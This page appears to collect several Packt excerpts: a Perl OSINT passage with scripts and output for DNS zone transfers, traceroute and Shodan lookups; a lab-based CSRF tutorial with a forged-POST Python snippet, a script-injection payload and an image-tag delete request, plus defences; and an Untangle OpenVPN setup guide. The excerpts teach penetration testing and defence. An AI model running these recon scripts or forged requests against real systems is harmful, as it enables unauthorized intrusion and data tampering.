The preceding Perl program loops through the @subDomains array and calls the dns() subroutine on each, which prints the result of a successful query. The $t integer token is used for subdomains that have several identical records, to avoid repetition in the program's output. After this, we simply print the total number of records tested. This program can be easily modified to open a word list file, and we can loop through each entry by passing it to the dns() subroutine, with something similar to the following:

open(FLE,"file.txt");
while(<FLE>){
 chomp; # strip the trailing newline before building the hostname
 dns($_);
}

Zone transfers

As we have seen with an A record, the admin.warcarrier.org entry provided us with some insight into the IP range of the internal network, or the class A address 10.0.0.1.
Sometimes, when a client target is controlling and hosting their own name servers, they accidentally allow DNS zone transfers from their name servers into public name servers, providing the attacker with information about where the target's resources are. Let's use the Linux host utility to check for a DNS zone transfer:

[trevelyn@shell ~]$ host -la warcarrier.org beth.ns.cloudflare.com
Trying "warcarrier.org"
Using domain server:
Name: beth.ns.cloudflare.com
Address: 2400:cb00:2049:1::adf5:3a67#53
Aliases:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20461
;; flags: qr aa; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
; warcarrier.org.           IN     AXFR
;; ANSWER SECTION:
warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800
warcarrier.org.     300     IN     NS     beth.ns.cloudflare.com.
warcarrier.org.     300     IN     NS     hank.ns.cloudflare.com.
warcarrier.org.     300     IN     A      50.97.177.66
admin.warcarrier.org. 300     IN     A       10.0.0.1
gateway.warcarrier.org. 300 IN   A       10.0.0.124
remote.warcarrier.org. 300     IN     A       10.0.0.15
partner.warcarrier.org. 300 IN   CNAME   warcarrier.weaknetlabs.com.
calendar.warcarrier.org. 300 IN   CNAME   login.secureserver.net.
direct.warcarrier.org. 300 IN   CNAME   warcarrier.org.
warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800
Received 401 bytes from 2400:cb00:2049:1::adf5:3a67#53 in 56 ms
[trevelyn@shell ~]$

As we can see from the output of the host command, we have found a successful DNS zone transfer, which provided us with even more hostnames used by our client target. This attack has provided us with a few CNAME records, which are used as aliases to other servers owned or used by our target, the subnet (class A) IP addresses used by the target, and even the name servers used. We can also see that the default name, direct, used by CloudFlare.com is still set for the cloud service to allow connections directly to the IP of warcarrier.org, which we can use to bypass the cloud service. The host command requires the name server, in our case beth.ns.cloudflare.com, before performing the transfer. What this means for us is that we will need the name server information before querying for a potential DNS zone transfer in our Perl programs. Let's see how we can use Net::DNS for the entire process:

#!/usr/bin/perl -w
use strict;
use Net::DNS;
my $usage = "perl dnsZt.pl <domain name>";
die $usage unless my $dom = shift;
my $res = Net::DNS::Resolver->new; # dns object
my $query = $res->query($dom,"NS"); # query method call for nameservers
if($query){ # query of NS was successful
 foreach my $rr (grep{$_->type eq 'NS'} $query->answer){
  $res->nameservers($rr->nsdname); # set the name server
  print "[>] Testing NS Server: ".$rr->nsdname."\n";
  my @subdomains = $res->axfr($dom);
  if ($#subdomains > 0){
   print "[!] Successful zone transfer:\n";
   foreach (@subdomains){
    print $_->name."\n"; # returns a Net::DNS::RR object
   }
  }else{ # 0 returned domains
   print "[>] Transfer failed on " . $rr->nsdname . "\n";
  }
 }
}else{ # Something went wrong:
 warn "query failed: ", $res->errorstring,"\n";
}

The preceding program, which uses the Net::DNS Perl module, will first query for the name servers used by our target and then test the DNS zone transfer for each of them.
The grep() function returns a list to the foreach() loop of all name servers (NS) found. The foreach() loop then simply attempts the DNS zone transfer (AXFR) and prints the results if the returned array holds more than zero elements. Let's test the output on our client target:

[trevelyn@shell ~]$ perl dnsZt.pl warcarrier.org
[>] Testing NS Server: hank.ns.cloudflare.com
[!] Successful zone transfer:
warcarrier.org
warcarrier.org
admin.warcarrier.org
gateway.warcarrier.org
remote.warcarrier.org
partner.warcarrier.org
calendar.warcarrier.org
direct.warcarrier.org
[>] Testing NS Server: beth.ns.cloudflare.com
[>] Transfer failed on beth.ns.cloudflare.com
[trevelyn@shell ~]$

The preceding (trimmed) output is a successful DNS zone transfer on one of the name servers used by our client target.

Traceroute

With knowledge of how to glean hostnames and IP addresses from simple queries using Perl, we can take the OSINT a step further and trace our route to the hosts to see what potentially target-owned hardware can intercept or relay traffic. For this task, we will use the Net::Traceroute Perl module. Let's take a look at how we can get the IP host information from the relaying hosts between us and our target, using this Perl module and the following code:

#!/usr/bin/perl -w
use strict;
use Net::Traceroute;
my $dom = shift or die "Usage: perl tracert.pl <domain>";
print "Tracing route to ",$dom,"\n";
my $tr = Net::Traceroute->new(host=>$dom,use_tcp=>1);
for(my $i=1;$i<=$tr->hops;$i++){
 my $hop = $tr->hop_query_host($i,0);
 print "IP: ",$hop," hop time: ",$tr->hop_query_time($i,0),
  "ms hop status: ",$tr->hop_query_stat($i,0),
  " query count: ",$tr->hop_queries($i),"\n" if($hop);
}

In the preceding Perl program, we used the Net::Traceroute Perl module to perform a trace route to the domain given by a command-line argument. The module must be used by first calling the new() method, which we do when defining $tr as a query object. We tell the trace route object $tr that we want to use TCP and also pass the host, which we shift from the command-line arguments. We can pass a lot more parameters to the new() method, one of which is debug=>9 to debug our trace route. A full list can be obtained from the CPAN Search page of the Perl module, which can be accessed at http://search.cpan.org/~hag/Net-Traceroute/Traceroute.pm. The hops method is used when constructing the for() loop and returns an integer value of the hop count. We then assign this to $i and loop through all hops and print statistics, using the hop_query_host method for the IP address of the host, hop_query_time for the time taken to reach the host (on our lab machines, it is returned in milliseconds), and hop_query_stat, which returns the status of the query as an integer value that can be mapped to the export list of Net::Traceroute according to the module's documentation.
Now, let's test this trace route program with a domain and check the output:

root@wnld960:~# sudo perl tracert.pl weaknetlabs.com
Tracing route to weaknetlabs.com
IP: 10.0.0.1 hop time: 0.724ms hop status: 0 query count: 3
IP: 68.85.73.29 hop time: 14.096ms hop status: 0 query count: 3
IP: 69.139.195.37 hop time: 19.173ms hop status: 0 query count: 3
IP: 68.86.94.189 hop time: 31.102ms hop status: 0 query count: 3
IP: 68.86.87.170 hop time: 27.42ms hop status: 0 query count: 3
IP: 50.242.150.186 hop time: 27.808ms hop status: 0 query count: 3
IP: 144.232.20.144 hop time: 33.688ms hop status: 0 query count: 3
IP: 144.232.25.30 hop time: 38.718ms hop status: 0 query count: 3
IP: 144.232.229.46 hop time: 31.242ms hop status: 0 query count: 3
IP: 144.232.9.82 hop time: 99.124ms hop status: 0 query count: 3
IP: 198.144.36.192 hop time: 30.964ms hop status: 0 query count: 3
root@wnld960:~#

The output from tracert.pl is just as we would expect from the traceroute program of the Linux shell. This functionality can be easily built right into our port scanner application.

Shodan

Shodan is an online resource that can be used for hardware searching within a specific domain. For instance, a search for hostname:<domain> will provide all the hardware entities found within this specific domain. Shodan is both a public and open source resource for intelligence. Harnessing the full power of Shodan and returning a multipage query is not free. For the examples in this article, the first page of the query results, which is free, was sufficient to provide a suitable amount of information. The returned output is XML, and Perl has some great utilities to parse XML. Luckily, for the purpose of our example, Shodan offers a sample query export for us to use as export_sample.xml. This XML file contains only one node per host, labeled host. This node contains attributes for the corresponding host, and we will use the XML::LibXML::Node class from the XML::LibXML Perl module. First, we will download the XML file and use XML::LibXML to open the local file with the parse_file() method, as shown in the following code:

#!/usr/bin/perl -w
use strict;
use XML::LibXML;
my $parser = XML::LibXML->new();
my $doc = $parser->parse_file("export_sample.xml");
foreach my $host ($doc->findnodes('/shodan/host')) {
 print "Host Found:\n";
 my @attribs = $host->attributes('/shodan/host');
 foreach my $host (@attribs){ # get host attributes
  print $host =~ m/([^=]+)=.*/," => ";
  print $host =~ m/.*"([^"]+)"/,"\n";
 } # next host
 print "\n\n";
}

The preceding Perl program will open the export_sample.xml file and navigate through the host nodes using the simple XPath of /shodan/host. For each <host> node, we call the attributes() method from the XML::LibXML::Node class, which returns an array of all attributes with information such as the IP address, hostname, and more. We then run a regular expression pattern on the $host string to parse out the key, and again with another regexp to get the value. Let's see how this returns data from our sample XML file from ShodanHQ.com:

root@wnld960:~# perl shodan.pl
Host Found:
hostnames => internetdevelopment.ro
ip => 109.206.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010
Host Found:
ip => 113.203.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010
Host Found:
hostnames => ip-173-201-71-21.ip.secureserver.net
ip => 173.201.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010

The preceding output is from our shodan.pl Perl program.
It loops through all host nodes and prints the attributes. As we can see, Shodan can provide us with some very useful information that we can possibly use to exploit later in our penetration testing. It's also easy to see, without going into elementary Perl coding examples, that we can find exactly what we are looking for from an XML object's attributes using this simple method. We can use this code for other resources as well. More intelligence Gaining information about the actual physical address is also important during a penetration test. Sure, this is public information, but where do we find it? Well, the PTES describes how most states require a legal entity of a company to register with the State Division, which can provide us with a one-stop go-to place for the physical address information, entity ID, service of process agent information, and more. This can be very useful information on our client target. If obtained, we can extend this intelligence by finding out more about the property owners for physical penetration testing and social engineering by checking the city/county's department of land records, real estate, deeds, or even mortgages. All of this data, if hosted on the Web, can be gathered by automated Perl programs, as we did in the example sections of this article using LWP::UserAgent. Summary As we have seen, being creative with our information-gathering techniques can really shine with the power of regular expressions and the ability to spider links. As we learned in the introduction, it's best to do an automated OSINT gathering process along with a manual process because both processes can reveal information that one might have missed. Resources for Article: Further resources on this subject: Ruby and Metasploit Modules [article] Linux Shell Scripting – various recipes to help you [article] Linux Shell Script: Logging Tasks [article]

Cross-site Request Forgery

Packt
17 Nov 2014
9 min read
In this article by Y.E Liang, the author of JavaScript Security, we will cover cross-site request forgery. This topic is not exactly new. Here, we will go deeper into cross-site request forgery and learn the various techniques of defending against it.

(For more resources related to this topic, see here.)

Introducing cross-site request forgery

Cross-site request forgery (CSRF) exploits the trust that a site has in a user's browser. It is also defined as an attack that forces an end user to execute unwanted actions on a web application in which the user is currently authenticated.

Examples of CSRF

We will now take a look at a basic CSRF example:

Go to the source code and change the directory. Run the following command:

python xss_version.py

Remember to start your MongoDB process as well.

Next, open external.html found in templates, on another host, say http://localhost:8888. You can do this by starting the server, which can be done by running python xss_version.py --port=8888, and then visiting http://localhost:8888/todo_external. You will see the following screenshot:

 Adding a new to-do item

Click on Add To Do, and fill in a new to-do item, as shown in the following screenshot:

 Adding a new to-do item and posting it

Next, click on Submit. Going back to your to-do list app at http://localhost:8000/todo and refreshing it, you will see the new to-do item added to the database, as shown in the following screenshot:

 To-do item is added from an external app; this is dangerous!

To attack the to-do list app, all we need to do is add a new item that contains a line of JavaScript, as shown in the following screenshot:

 Adding a new to do for the Python version

Now, click on Submit. Then, go back to your to-do app at http://localhost:8000/todo, and you will see two subsequent alerts, as shown in the following screenshot:

 Successfully injected JavaScript part 1

So here's the first instance where CSRF happens:

 Successfully injected JavaScript part 2

Take note that this can happen to backends written in other languages as well. Now go to your terminal, turn off the Python server backend, and change the directory to node/. Start the node server by issuing this command:

node server.js

This time around, the server is running at http://localhost:8080, so remember to change the $.post() endpoint from http://localhost:8000 to http://localhost:8080 in external.html, as shown in the following code:

   function addTodo() {
     var data = {
       text: $('#todo_title').val(),
       details: $('#todo_text').val()
     }
     // $.post('http://localhost:8000/api/todos', data, function(result) {
     $.post('http://localhost:8080/api/todos', data, function(result) {
       var item = todoTemplate(result.text, result.details);
       $('#todos').prepend(item);
       $("#todo-form").slideUp();
     })
   }

The changed line is found in addTodo(); the highlighted code is the correct endpoint for this section. Now, going back to external.html, add a new to-do item containing JavaScript, as shown in the following screenshot:

 Trying to inject JavaScript into a to-do app based on Node.js

As usual, submit the item. Go to http://localhost:8080/api/ and refresh; you should see two alerts (or four alerts if you didn't delete the previous ones). The first alert is as follows:

 Successfully injected JavaScript part 1

The second alert is as follows:

 Successfully injected JavaScript part 2

Now that we have seen what can happen to our app if we suffer a CSRF attack, let's think about how such attacks can happen.
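In fact, an attacker does not even need a browser to plant data here: because the /api/todos endpoint accepts any POST it receives, a few lines of Python are enough to forge the same request that external.html makes. The following is a rough sketch of that idea (the requests library is an assumption here; install it separately):

import requests

# Forge the same POST that external.html sends; the unprotected
# endpoint requires no token, cookie, or session information
data = {
    'text': 'injected title',
    'details': '<script>alert("attacked");</script>'
}
r = requests.post('http://localhost:8000/api/todos', data=data)
print r.status_code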
Basically, such attacks can happen when our API endpoints (or URLs accepting requests) are not protected at all. Attackers can exploit such vulnerabilities by simply observing which endpoints are used and attempting to exploit them by performing a basic HTTP POST operation against them.

Basic defense against CSRF attacks

If you are using modern frameworks or packages, the good news is that you can easily protect against such attacks by turning on or making use of their CSRF protection. For example, for server.py, you can turn on xsrf_cookies by setting it to True, as shown in the following code:

class Application(tornado.web.Application):
   def __init__(self):
       handlers = [
           (r"/api/todos", Todos),
           (r"/todo", TodoApp)
       ]
       conn = pymongo.Connection("localhost")
       self.db = conn["todos"]
       settings = dict(
           xsrf_cookies=True,
           debug=True,
           template_path=os.path.join(os.path.dirname(__file__), "templates"),
           static_path=os.path.join(os.path.dirname(__file__), "static")
       )
       tornado.web.Application.__init__(self, handlers, **settings)

Note the highlighted line, where we set xsrf_cookies=True. Have a look at the following code snippet:

var express    = require('express');
var bodyParser = require('body-parser');
var app        = express();
var session    = require('cookie-session');
var csrf       = require('csrf');

app.use(csrf());
app.use(bodyParser());

The highlighted lines are the new lines (compared to server.js) that add CSRF protection. Now that both backends are equipped with CSRF protection, you can try to make the same post from external.html; you will not be able to. For example, you can open Chrome's developer tool and go to Network. You will see the following:

 POST forbidden

On the terminal, you will see a 403 error from our Python server, which is shown in the following screenshot:

 POST forbidden from the server side

Other examples of CSRF

CSRF can also happen in many other ways. In this section, we'll cover other basic examples of how CSRF can happen.

CSRF using <img> tags

This is a classic example. Consider the following instance:

<img src=http://yoursite.com/delete?id=2 />

Should you load a site that contains this img tag, chances are that a piece of data may get deleted unknowingly.

Now that we have covered the basics of preventing CSRF attacks through the use of CSRF tokens, the next question you may have is: what if there are times when you need to expose an API to an external app? For example, Facebook's Graph API, Twitter's API, and so on, allow external apps not only to read, but also write data to their systems. How do we prevent malicious attacks in this situation? We'll cover this and more in the next section.

Other forms of protection

Using CSRF tokens may be a convenient way to protect your app from CSRF attacks, but it can be a hassle at times. As mentioned in the previous section, what about the times when you need to expose an API to allow mobile access? Or, your app is growing so quickly that you want to accelerate that growth by creating a Graph API of your own. How do you manage it then? In this section, we will go quickly over the techniques for protection.
Creating your own app ID and app secret – OAuth-styled

Creating your own app ID and app secret is similar to what the major Internet companies do right now: they require developers to sign up for developer accounts and attach an application ID and secret key to each of their apps. Using these credentials, the developers then exchange OAuth credentials in order to make any API calls, as shown in the following screenshot:

 Google requires developers to sign up, and it assigns the client ID

On the server end, all you need to do is check for the application ID and secret key; if they are not present, simply reject the request. Have a look at the following screenshot:

 The same thing with Facebook; Facebook requires you to sign up, and it assigns an app ID and app secret

Checking the Origin header

Simply put, you want to check where a request is coming from, and the Origin header, in layman's terms, tells you exactly that. There are at least two use cases for checking the Origin header, which are as follows:

Assuming your endpoint is used internally (by your own web application), you can check whether the requests are indeed made from the same website, that is, your website.

If you are creating an endpoint for external use, such as those similar to Facebook's Graph API, you can make developers register the website URL where they are going to use the API. If the website URL does not match the registered one, you can reject the request.

Note that the Origin header can also be modified; for example, an attacker can forge the header on a request they craft themselves.

Limiting the lifetime of the token

Assuming that you are generating your own tokens, you may also want to limit the lifetime of each token, for instance, making a token valid only for a certain time period while the user is logged in to your site. Similarly, your site can make the token a requirement for requests to be made; if the token does not exist, HTTP requests cannot be made.

Summary

In this article, we covered the basic forms of CSRF attacks and how to defend against them. Note that these security loopholes can come from both the frontend and the server side.

Resources for Article:

Further resources on this subject: Implementing Stacks using JavaScript [Article] Cordova Plugins [Article] JavaScript Promises – Why Should I Care? [Article]

Untangle VPN Services

Packt
30 Oct 2014
18 min read
This article by Abd El-Monem A. El-Bawab, the author of Untangle Network Security, covers the Untangle VPN solution, OpenVPN. OpenVPN is an SSL/TLS-based VPN, which is mainly used for remote access as it is easy to configure and has clients that work on multiple operating systems and devices. OpenVPN can also provide site-to-site connections (only between two Untangle servers) with limited features.

(For more resources related to this topic, see here.)

OpenVPN

Untangle's OpenVPN is an SSL-based VPN solution that is based on the well-known open source application, OpenVPN. Untangle's OpenVPN is mainly used for client-to-site connections, with a client that is easy to deploy and configure and is widely available for Windows, Mac, Linux, and smartphones. Untangle's OpenVPN can also be used for site-to-site connections, but the two sites need to have Untangle servers. Site-to-site connections between Untangle and third-party devices are not supported.

How OpenVPN works

In reference to the OSI model, an SSL/TLS-based VPN will only encrypt the application layer's data, while the lower layers' information is transferred unencrypted. In other words, the application packets are encrypted. The IP addresses of the VPN server and client are visible, and the port number that the server uses for communication with the client is also visible, but the actual application port number is not. Furthermore, the ultimate destination IP address of the tunneled traffic is not visible; only the VPN server's IP address is seen.

Secure Sockets Layer (SSL) and Transport Layer Security (TLS) refer to the same thing; SSL is the predecessor of TLS. SSL was originally developed by Netscape, and many releases were produced (V.1 to V.3) till it was standardized under the TLS name.

The steps to create an SSL-based VPN are as follows:

The client will send a message to the VPN server that it wants to initiate an SSL session. Also, it will send a list of all the ciphers (hash and encryption protocols) that it supports.

The server will respond with a set of selected ciphers and will send its digital certificate to the client. The server's digital certificate includes the server's public key.

The client will try to verify the server's digital certificate by checking it against trusted certificate authorities and by checking the certificate's validity (valid from and valid through dates).

The server may need to authenticate the client before allowing it to connect to the internal network. This could be achieved either by asking for a valid username and password or by using the user's digital identity certificates. Untangle NGFW uses the digital certificates method.

The client will create a session key (which will be used to encrypt the data transferred between the two devices) and will send this key to the server, encrypted with the server's public key. Thus, no third party can obtain the session key, because the server is the only party that holds the private key needed to decrypt it.

The server will acknowledge to the client that it has received the session key and is ready for the encrypted data transfer.

Configuring Untangle's OpenVPN server settings

After installing the OpenVPN application, the application will be turned off. You'll need to turn it on before you can use it. You can configure Untangle's OpenVPN server settings under OpenVPN settings | Server.
The settings configure how OpenVPN behaves as a server for remote clients (which can be clients on Windows, Linux, or any other operating system, or another Untangle server). The different available settings are as follows:

Site Name: This is the name of the OpenVPN site, used to identify this server among the other OpenVPN servers inside your organization. This name should be unique across all Untangle servers in the organization. A random name is automatically chosen for the site name.

Site URL: This is the URL that the remote client will use to reach this OpenVPN server. This can be configured under Config | Administration | Public Address. If you have more than one WAN interface, the remote client will first try to initiate the connection using the settings defined in the public address. If this fails, it will randomly try the IPs of the remaining WAN interfaces.

Server Enabled: If checked, the OpenVPN server will run and accept connections from remote clients.

Address Space: This defines the IP subnet that will be used to assign IPs to the remote VPN clients. The value in Address Space must be unique and separate from all existing networks and other OpenVPN address spaces. A default address space that does not conflict with the existing configuration will be chosen:

Configuring Untangle's OpenVPN remote client settings

Untangle's OpenVPN allows you to create OpenVPN clients to give your office employees, when they are out of the company, the ability to remotely access your internal network resources via their PCs and/or smartphones. Also, an OpenVPN client can be imported to another Untangle server to provide a site-to-site connection. Each OpenVPN client will have its own unique IP (from the address space range defined previously). Thus, each OpenVPN client can only be used by one user. For multiple users, you'll have to create multiple clients, as using the same client for multiple users will result in client disconnection issues.

Creating a remote client

You can create remote access clients by clicking on the Add button located under OpenVPN Settings | Server | Remote Clients. A new window will open, which has the following settings:

Enabled: If this checkbox is checked, the client will be allowed to connect to the OpenVPN server. If unchecked, the connection will not be allowed.

Client Name: Give a unique name for the client; this will help you identify the client. Only alphanumeric characters are allowed.

Group: Specify the group the client will be a member of. Groups are used to apply similar settings to their members.

Type: Select Individual Client for remote access and Network for site-to-site VPN.

The following screenshot shows a remote access client created for JDoe:

After configuring the client settings, you'll need to press the Done button and then the OK or Apply button to save this client configuration. The new client will be available under the Remote Clients tab, as shown in the following screenshot:

Understanding remote client groups

Groups are used to group clients together and apply similar settings to the group members. By default, there will be a Default Group. Each group has the following settings:

Group Name: Give a suitable name for the group that describes the group settings (for example, full tunneling clients) or the target clients (for example, remote access clients).

Full Tunnel: If checked, all the traffic from the remote clients will be sent to the OpenVPN server, which allows Untangle to filter traffic directed to the Internet.
If unchecked, the remote client will run in the split tunnel mode, which means that traffic directed to local resources behind Untangle is sent through the VPN, while traffic directed to the Internet is sent through the machine's default gateway. You can't use Full Tunnel for site-to-site connections.

Push DNS: If checked, the remote OpenVPN client will use the DNS settings defined by the OpenVPN server. This is useful to resolve local names and services.

Push DNS server: If OpenVPN server is selected, remote clients will use the OpenVPN server for DNS queries. If set to Custom, the DNS servers configured here will be used for DNS queries.

Push DNS Custom 1: If Push DNS server is set to Custom, the value configured here will be used as the primary DNS server for the remote client. If blank, no setting will be pushed to the remote client.

Push DNS Custom 2: If Push DNS server is set to Custom, the value configured here will be used as the secondary DNS server for the remote client. If blank, no setting will be pushed to the remote client.

Push DNS Domain: The configured value will be pushed to the remote clients to extend their domain search path during DNS resolution.

The following screenshot illustrates all these settings:

Defining the exported networks

Exported networks are used to define the internal networks behind the OpenVPN server that the remote client can reach after a successful connection. Additional routes will be added to the remote client's routing table, stating that the exported networks (the main site's internal subnets) are reachable through the OpenVPN server. By default, each static non-WAN interface network will be listed in the Exported Networks list:

You can modify the default settings or create new entries. The Exported Networks settings are as follows:

Enabled: If checked, the defined network will be exported to the remote clients.

Export Name: Enter a suitable name for the exported network.

Network: This defines the exported network. The exported network should be written in CIDR form.

These settings are illustrated in the following screenshot:

Using OpenVPN remote access clients

So far, we have been configuring the client settings but haven't created the actual package to be used on remote systems. We can get the remote client package by pressing the Download Client button located under OpenVPN Settings | Server | Remote Clients, which will start the process of building the OpenVPN client that will be distributed:

There are three available options to download the OpenVPN client. The first option is to download the client as a .exe file to be used with the Windows operating system. The second option is to download the client configuration files, which can be used with the Apple and Linux operating systems. The third option is similar to the second one, except that the configuration file will be imported to another Untangle NGFW server, which is used for site-to-site scenarios. The following screenshot illustrates this:

The configuration files include the following files:

<Site_name>.ovpn
<Site_name>.conf
keys\<Site_name>-<User_name>.crt
keys\<Site_name>-<User_name>.key
keys\<Site_name>-<User_name>-ca.crt

The certificate files are used for client authentication, and the .ovpn and .conf files hold the defined connection settings (that is, the OpenVPN server IP, the port used, and the ciphers used).
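To give a rough idea of what these connection settings look like, the following is an illustrative client profile; the remote hostname, port, and cipher shown here are assumptions and will differ depending on your site name and public address settings:

client
dev tun
proto udp
remote vpn.example.com 1194          # the server's public address (illustrative)
ca keys\<Site_name>-<User_name>-ca.crt
cert keys\<Site_name>-<User_name>.crt
key keys\<Site_name>-<User_name>.key
cipher AES-128-CBC                   # negotiated cipher (illustrative)
verb 3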
The following screenshot shows the .ovpn file for the site Untangle-1849:

As shown in the following screenshot, the created file (openvpn-JDoe-setup.exe) includes the client name, which helps you identify the different clients and simplifies the process of distributing each file to the right user:

Using an OpenVPN client with Windows OS

Using an OpenVPN client with the Windows operating system is really very simple. To do this, perform the following steps:

Set up the OpenVPN client on the remote machine. The setup is very easy: just next, next, install, and finish. It is important to install and run the application as an administrator in order to allow the client to write the VPN routes to the Windows routing table. You should run the client as an administrator every time you use it so that the client can create the required routes.
Double-click on the OpenVPN icon on the Windows desktop: The application will run in the system tray:
Right-click on the application's system tray icon and select Connect. The client will start to initiate the connection to the OpenVPN server and a window with the connection status will appear, as shown in the following screenshot:

Once the VPN tunnel is initiated, a notification will appear from the client with the IP assigned to it, as shown in the following screenshot:

If the OpenVPN client is running in the taskbar with an established connection, the client will automatically reconnect to the OpenVPN server if the tunnel drops because Windows went to sleep.

By default, the OpenVPN client will not start at Windows login. We can change this and allow it to start without requiring administrative privileges by going to Control Panel | Administrative Tools | Services and changing the OpenVPN service's Startup Type to automatic. Now, in the start parameters field, put --connect <Site_name>.ovpn; you can find <Site_name>.ovpn under C:\Program Files\OpenVPN\config.

Using OpenVPN with non-Windows clients

The method to configure OpenVPN clients to work with Untangle is the same for all non-Windows clients. Simply download the .zip file provided by Untangle, which includes the configuration and certificate files, and place them into the application's configuration folder. The steps are as follows:

Download and install any of the following OpenVPN-compatible clients for your operating system:

For Mac OS X, Untangle, Inc. suggests using Tunnelblick, which is available at http://code.google.com/p/tunnelblick
For Linux, OpenVPN clients for different Linux distros can be found at https://openvpn.net/index.php/access-server/download-openvpn-as-sw.html
OpenVPN Connect for iOS is available at https://itunes.apple.com/us/app/openvpn-connect/id590379981?mt=8
OpenVPN for Android 4.0+ is available at https://play.google.com/store/apps/details?id=net.openvpn.openvpn

Log in to the Untangle NGFW server, download the .zip client configuration file, and extract the files from the .zip file.
Place the configuration files into any of the following OpenVPN-compatible applications:

Tunnelblick: Manually copy the files into the Configurations folder located at ~/Library/Application Support/Tunnelblick.
Linux: Copy the extracted files into /etc/openvpn, and then you can connect using sudo openvpn /etc/openvpn/<Site_name>.conf.
iOS: Open iTunes and select the files from the config ZIP file to add to the app on your iPhone or iPad.
Android: In the OpenVPN for Android application, open the list of VPN profiles.
In the top-right corner, click on the folder icon, and then browse to the folder where you have the OpenVPN .conf file. Click on the file and hit Select. Then, in the top-right corner, hit the little floppy disc icon to save the import. Now, you should see the imported profile. Click on it to connect to the tunnel. For more information on this, visit http://forums.untangle.com/openvpn/30472-openvpn-android-4-0-a.html.

Run the OpenVPN-compatible client.

Using OpenVPN for site-to-site connection

To use OpenVPN for a site-to-site connection, one Untangle NGFW server will run in OpenVPN server mode, and the other server will run in client mode. We will need to create a client that will be imported into the remote server. The client settings are shown in the following screenshot:

We will need to download the client configuration intended to be imported into another Untangle server (the third option available on the client download menu), and then import this zipped client configuration on the remote server. To import the client, on the remote server under the Client tab, browse to the .zip file and press the Submit button. The client will be shown as follows:

You'll need to restart the two servers before being able to use the OpenVPN site-to-site connection. The site-to-site connection is bidirectional.

Reviewing the connection details

The currently connected clients (whether OS clients or another Untangle NGFW server) will appear under Connected Remote Clients located under the Status tab. The screen will show the client name, its external address, and the address assigned to it by OpenVPN, in addition to the connection start time and the amount of data transmitted and received (in MB) during this connection:

For the site-to-site connection, the client server will show the name of the remote server and whether the connection is established or not, in addition to the amount of transmitted and received data in MB:

Event logs show a detailed connection history, as shown in the following screenshot:

In addition, there are two reports available for Untangle's OpenVPN:

Bandwidth usage: This report shows the maximum and average data transfer rate (KB/s) and the total amount of data transferred that day
Top users: This report shows the top users connected to the Untangle OpenVPN server

Troubleshooting Untangle's OpenVPN

In this section, we will discuss some points to consider when dealing with Untangle NGFW OpenVPN.

OpenVPN acts as a router, as it routes between different networks. Using OpenVPN with Untangle NGFW in bridge mode (the Untangle NGFW server is behind another router) requires additional configuration. The required configurations are as follows:

Create a static route on the router that will route any traffic from the VPN range (the VPN address pool) to the Untangle NGFW server.
Create a port forward rule for the OpenVPN port 1194 (UDP) on the router to Untangle NGFW.

Verify that your setting is correct by going to Config | Administration | Public Address, as it is used by Untangle to configure OpenVPN clients, and ensure that the configured address is resolvable from outside the company.

If the OpenVPN client is connected, but you can't access anything, perform the following steps:

Verify that the hosts you are trying to reach are exported in Exported Networks.
Try to ping the Untangle NGFW LAN IP address (if exported).
Try to bring up the Untangle NGFW GUI by entering the IP address in a browser.

If the preceding tasks work, your tunnel is up and operational.
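These manual checks can also be scripted from the client side. The following is a minimal Python sketch (the LAN IP and port are hypothetical placeholders) that tests whether the Untangle GUI answers across the tunnel, mirroring the browser test above:

import socket

# Hypothetical values: the exported Untangle LAN IP and the HTTPS port of its GUI.
UNTANGLE_LAN_IP = "172.16.1.1"
GUI_PORT = 443

def tcp_reachable(host, port, timeout=3):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if tcp_reachable(UNTANGLE_LAN_IP, GUI_PORT):
    print("Tunnel looks operational: the Untangle GUI answers over the VPN")
else:
    print("No answer: check Exported Networks, routes, and firewall rules")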
If you can't reach any clients inside the network, check for the following conditions:

The client machine's firewall is not preventing the connection from the OpenVPN client.
The client machine uses Untangle as a gateway or has a static route that sends the VPN address pool to Untangle NGFW.

In addition, some port forwarding rules on Untangle NGFW are needed for OpenVPN to function properly. The required ports are 53, 445, 389, 88, 135, and 1025.

If the site-to-site tunnel is set up correctly, but the two sites can't talk to each other, the reasons may be as follows:

If your sites have IPs from the same subnet (this usually happens when you use a service from the same ISP for both branches), OpenVPN may fail, as it considers that no routing is needed between IPs in the same subnet; you should ask your ISP to change the IPs.
To get DNS resolution to work over the site-to-site tunnel, you'll need to go to Config | Network | Advanced | DNS Server | Local DNS Servers and add the IP of the DNS server on the far side of the tunnel. Enter the domain in the Domain List column and use the FQDN when accessing resources. You'll need to do this on both sides of the tunnel for it to work from either side.
If you are using site-to-site VPN in addition to client-to-site VPN, but the OpenVPN client is only able to connect to the main site, you'll need to add the VPN address pool to Exported Hosts and Networks.

Lab-based training

This section will provide training for the OpenVPN site-to-site and client-to-site scenarios. In this lab, we will mainly use Untangle-01, Untangle-03, and a laptop (192.168.1.7).

The ABC bank started a project with Acme schools. As a part of this project, the ABC bank team needs to periodically access files located on Acme-FS01. So, the two parties decided to opt for OpenVPN. However, Acme's network team doesn't want to leave access wide open for ABC bank members, so they set firewall rules to limit ABC bank's access to the file server only. In addition, the IT team director wants to have VPN access from home to the Acme network, which they decided to accomplish using OpenVPN. The following diagram shows the environment used in the site-to-site scenario:

To create the site-to-site connection, we will need to follow these steps:

Enable the OpenVPN server on Untangle-01.
Create a network type client with a remote network of 172.16.1.0/24.
Download the client and import it under the Client tab in Untangle-03.
Restart the two servers.

After the restart, you have a site-to-site VPN connection. However, the Acme network is wide open to the ABC bank, so we need to create a limiting firewall rule. On Untangle-03, create a rule that allows any traffic that comes from the OpenVPN interface with a source of 172.16.136.10 (the Untangle-01 client IP) and a destination of 172.16.1.7 (Acme-FS01). The rule is shown in the following screenshot:

Also, we will need a general block rule that comes after the preceding rule in the rule evaluation order. The environment used for the client-to-site connection is shown in the following diagram:

